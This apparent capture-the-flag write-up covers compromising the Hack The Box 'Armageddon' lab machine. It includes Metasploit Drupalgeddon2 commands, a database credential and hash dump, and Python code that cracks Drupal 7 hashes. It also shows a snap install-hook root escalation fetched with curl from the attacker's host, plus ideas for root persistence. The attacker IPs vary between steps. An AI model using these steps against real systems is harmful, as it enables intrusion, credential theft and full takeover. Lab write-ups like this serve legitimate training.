HTB: Armageddon

Praddyum Verma
5 min read · Jul 25, 2021

Machine IP: 10.10.10.233
System IP: 10.10.16.12

Network Mapper

nmap -T4 -p- -A -v -oN ./Nmap.txt 10.10.10.233

which gives the following output:

Nmap scan report for 10.10.10.233
Host is up (0.17s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
| 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to Armageddon | Armageddon
16971/tcp filtered unknown
21142/tcp filtered unknown
58039/tcp filtered unknown

On visiting http://10.10.10.233/ we are greeted with a login page

Armageddon home page

Before trying to brute-force the login, let's look for low-hanging fruit. http://10.10.10.233/robots.txt lists `/CHANGELOG.txt` under `Disallow:`, and that file is still readable: it shows the site is running Drupal 7.56 (June 2017). That release predates the SA-CORE-2018-002 fix (7.58), so it is vulnerable to Drupalgeddon2, CVE-2018-7600, an unauthenticated remote code execution bug in Drupal's Form API.

Sensitive data exposure

Searching for an exploit led me to the Rapid7 page for the Metasploit module `exploit/unix/webapp/drupal_drupalgeddon2`. Setting the options:

msfconsole
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set RHOSTS 10.10.10.233
set LHOST 10.10.14.175
exploit

That gives us a shell, but only as the low-privileged `apache` user (the web server's service account), and we can't list the user directory under /home/.

Listing of /

Our present working directory is `/var/www/html`, with the following contents (note `backdoor.php`, `shell.php`, `sql.dump`, `test.sh` and `z41d.sh`, dated Jun 5: none of these belong to a stock Drupal 7.56 tree):

-rw-r--r--. 1 apache apache 317 Jun 21 2017 .editorconfig
-rw-r--r--. 1 apache apache 174 Jun 21 2017 .gitignore
-rw-r--r--. 1 apache apache 6112 Jun 21 2017 .htaccess
-rw-r--r--. 1 apache apache 111613 Jun 21 2017 CHANGELOG.txt
-rw-r--r--. 1 apache apache 1481 Jun 21 2017 COPYRIGHT.txt
-rw-r--r--. 1 apache apache 1717 Jun 21 2017 INSTALL.mysql.txt
-rw-r--r--. 1 apache apache 1874 Jun 21 2017 INSTALL.pgsql.txt
-rw-r--r--. 1 apache apache 1298 Jun 21 2017 INSTALL.sqlite.txt
-rw-r--r--. 1 apache apache 17995 Jun 21 2017 INSTALL.txt
-rw-r--r--. 1 apache apache 18092 Nov 16 2016 LICENSE.txt
-rw-r--r--. 1 apache apache 8710 Jun 21 2017 MAINTAINERS.txt
-rw-r--r--. 1 apache apache 5382 Jun 21 2017 README.txt
-rw-r--r--. 1 apache apache 10123 Jun 21 2017 UPGRADE.txt
-rw-r--r--. 1 apache apache 6604 Jun 21 2017 authorize.php
-rw-r--r--. 1 apache apache 5492 Jun 5 16:42 backdoor.php
-rw-r--r--. 1 apache apache 720 Jun 21 2017 cron.php
drwxr-xr-x. 4 apache apache 4096 Jun 21 2017 includes
-rw-r--r--. 1 apache apache 529 Jun 21 2017 index.php
-rw-r--r--. 1 apache apache 703 Jun 21 2017 install.php
drwxr-xr-x. 4 apache apache 4096 Dec 4 2020 misc
drwxr-xr-x. 42 apache apache 4096 Jun 21 2017 modules
drwxr-xr-x. 5 apache apache 70 Jun 21 2017 profiles
-rw-r--r--. 1 apache apache 2189 Jun 21 2017 robots.txt
drwxr-xr-x. 2 apache apache 261 Jun 21 2017 scripts
-rw-r--r--. 1 apache apache 75 Jun 5 19:08 shell.php
drwxr-xr-x. 4 apache apache 75 Jun 21 2017 sites
-rw-r--r--. 1 apache apache 1717749 Jun 5 18:33 sql.dump
-rw-r--r--. 1 apache apache 41 Jun 5 18:55 test.sh
drwxr-xr-x. 7 apache apache 94 Jun 21 2017 themes
-rw-r--r--. 1 apache apache 19986 Jun 21 2017 update.php
-rw-r--r--. 1 apache apache 2200 Jun 21 2017 web.config
-rw-r--r--. 1 apache apache 417 Jun 21 2017 xmlrpc.php
-rw-r--r--. 1 apache apache 41 Jun 5 18:32 z41d.sh

After some enumeration we find the MySQL credentials in `/var/www/html/sites/default/settings.php` (Drupal 7 keeps them in the `$databases` array there).

Inside default mysql creds

So let's log in to MySQL with those credentials:

mysql -u <username> -p

Now let's look at the databases and dump the Drupal users table:

show databases;
use drupal;
select * from users;

Output over the Metasploit session can take a while to appear, but it does come back:

uid     name    pass    mail    theme   signature       signature_format        created access  login   status  timezone  language        picture init    data
0 NULL 0 0 0 0 NULL 0 NULL
1 br************n $S$DgL2gxxxxxxxxxxxxxxxxxxxxxxxxxxxxx7.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;}

So we have the administrator account (uid 1; uid 0 is Drupal's anonymous-user row) and its password hash:

br************n : $S$DgL2gxxxxxxxxxxxxxxxxxxxxxxxxxxxxx7.oOsUf1xAhaadURt

With some googling I landed on a Stack Overflow page explaining the format: Drupal 7 stores passwords as `$S$`, one cost character, an 8-character salt and the encoded digest, 55 characters in total, computed as SHA-512 iterated 2^cost times over salt and password. The `D` after `$S$` here is Drupal 7's default cost of 15, i.e. 32768 rounds, which is why cracking is slower than for a plain salted SHA-512. John the Ripper handles this as the `Drupal7` format (hashcat mode 7900).

Let's crack it using John the Ripper and rockyou.txt.

And we cracked the password
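The hashing scheme just described, as an added example (Python, written for this walkthrough; not code from the original post or from Drupal itself): a port of the `$S$` routine from Drupal 7's includes/password.inc, plus a verifier and a minimal dictionary loop. The demo password, the wordlist and the simplified salt generation are constructed here for illustration; real cracking is what john/hashcat do at far higher speed.

```python
"""Drupal 7 password hash ($S$...) verifier and tiny wordlist cracker.

Port of the relevant parts of Drupal 7's includes/password.inc (written for
this walkthrough; not the post's or Drupal's own code).
"""
import hashlib
import hmac
import secrets
from typing import Iterable, Optional

# phpass-style alphabet; the character after "$S$" indexes into it to give log2(rounds).
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55      # stored hashes are truncated to this many characters
DRUPAL_MIN_HASH_COUNT = 7    # Drupal rejects cost values outside [7, 30]
DRUPAL_MAX_HASH_COUNT = 30


def password_base64_encode(data: bytes) -> str:
    """Drupal's _password_base64_encode(): 6-bit packing, little-endian, no padding."""
    out = []
    i, count = 0, len(data)
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def drupal7_crypt(password: str, setting: str) -> Optional[str]:
    """Drupal's _password_crypt('sha512', ...). `setting` is the first 12 chars of a
    stored hash: '$S$' + cost character + 8-char salt. Returns the 55-char hash,
    or None when the setting is malformed or out of range."""
    setting = setting[:12]
    if not setting.startswith("$S$") or len(setting) != 12:
        return None
    count_log2 = ITOA64.find(setting[3])
    if not DRUPAL_MIN_HASH_COUNT <= count_log2 <= DRUPAL_MAX_HASH_COUNT:
        return None
    salt = setting[4:12].encode()
    pw = password.encode("utf-8")
    # SHA-512(salt || password), then 2**count_log2 rounds of SHA-512(previous || password)
    h = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):
        h = hashlib.sha512(h + pw).digest()
    return (setting + password_base64_encode(h))[:DRUPAL_HASH_LENGTH]


def check_password(password: str, stored_hash: str) -> bool:
    """Equivalent of user_check_password() for $S$ hashes, with a constant-time compare."""
    computed = drupal7_crypt(password, stored_hash)
    return computed is not None and hmac.compare_digest(computed, stored_hash)


def hash_password(password: str, count_log2: int = 15) -> str:
    """Produce a fresh Drupal 7 hash. 15 is Drupal 7's default cost, i.e. the 'D' in '$S$D...'.
    Salt generation is simplified here to 8 random alphabet characters (same stored format)."""
    salt = "".join(secrets.choice(ITOA64) for _ in range(8))
    return drupal7_crypt(password, "$S$" + ITOA64[count_log2] + salt)


def crack(stored_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: the same work john/hashcat do for this format."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\n")
        if check_password(candidate, stored_hash):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed demo: hash a known password, then recover it from a toy wordlist.
    demo = hash_password("correct horse battery staple")
    print(demo, "->", crack(demo, ["123456", "password", "correct horse battery staple"]))
```

The cost character is the reason to let a dedicated cracker do the work: every candidate costs 2^15 SHA-512 calls against a `$S$D` hash, so a pure-Python loop over rockyou.txt would take hours where John needs minutes.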

Let's SSH in with the recovered password:

ssh br************n@10.10.10.233

and we can read user.txt.

With `sudo -l` we see:

User brucetherealadmin may run the following commands on armageddon:
(root) NOPASSWD: /usr/bin/snap install *

A search on GTFOBins for `snap` gives us everything we need.

What's happening: a snap package can carry an `install` hook, and snapd runs hooks as root at install time. With a NOPASSWD rule on `snap install *` we can build our own snap with fpm, put whatever we want in that hook, and install it. `--dangerous` makes snapd accept an unsigned local file and `--devmode` drops confinement, so the hook has full access to the file system.

If you follow the GTFOBins page as-is (with `COMMAND=id`), the install fails deliberately (the hook ends with `false`) and snapd echoes the hook's output in its error message:

- Run install hook of "xxxx" snap if present (run hook "install": uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0)

So it is simply running `id` inside the hook, and the output shows that it executes as root. Let's customise the package to run what we actually want.

Note: make sure fpm is installed on your machine (it is a Ruby gem: `gem install fpm`), along with `squashfs-tools`, which fpm needs to build the snap.

# Command to run as root inside the snap's install hook. Absolute path so it
# does not depend on the hook's working directory.
COMMAND='cat /root/root.txt'
cd $(mktemp -d)
mkdir -p meta/hooks
# "; false" makes the hook fail on purpose: snapd then prints the hook's
# stdout/stderr in its error message, which is how we get the output back.
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
# Package the meta/ tree as a snap named xxxx; output is xxxx_1.0_all.snap
fpm -n xxxx -s dir -t snap -a all meta

Since we only needed the root flag, the hook just reads it. If we wanted a root shell instead, the same hook could add our user to the wheel group, append a NOPASSWD entry for our user to /etc/sudoers (or make that file writable), copy /bin/bash somewhere and set it SUID, or drop our SSH key into /root/.ssh/authorized_keys; anything in the hook runs as root.

Then serve the resulting `xxxx_1.0_all.snap` from our machine:

python3 -m http.server 8080

and fetch it on the target:

curl http://10.10.14.214:8080/xxxx_1.0_all.snap --output xxxx_1.0_all.snap

and install it:

sudo snap install xxxx_1.0_all.snap --dangerous --devmode

The install hook runs as root, and the root flag comes back in snapd's error output.

And done, We’ll meet soon with another awesome writeup till then stay tuned and keep hacking.
